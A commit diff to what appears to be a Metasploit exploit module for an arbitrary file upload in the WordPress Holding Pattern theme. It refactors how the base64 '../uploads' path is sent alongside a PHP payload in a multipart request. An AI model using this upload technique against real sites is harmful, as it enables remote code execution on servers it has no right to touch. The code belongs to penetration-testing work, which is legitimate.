Add encoding of the upload path into the module

Author: rastating

modules/exploits/unix/webapp/wp_holding_pattern_file_upload.rb

@@ -63,8 +63,15 @@ def generate_mime_message(payload, payload_name)
     data = Rex::MIME::Message.new
     target_ip = IPSocket.getaddress(rhost)
     field_name = Rex::Text.md5(target_ip)
+
+    # In versions 1.2 and 1.3 of the theme, the upload directory must
+    # be encoded in base64 and sent with the request. To maintain
+    # compatibility with the hardcoded path of ../uploads in prior
+    # versions, we will send the same path in the request.
+    upload_path = Rex::Text.encode_base64('../uploads')
+
     data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{field_name}\"; filename=\"#{payload_name}\"")
-    data.add_part('Li4vdXBsb2Fkcw==', nil, nil, 'form-data; name="upload_path"')
+    data.add_part(upload_path, nil, nil, 'form-data; name="upload_path"')
     data
   end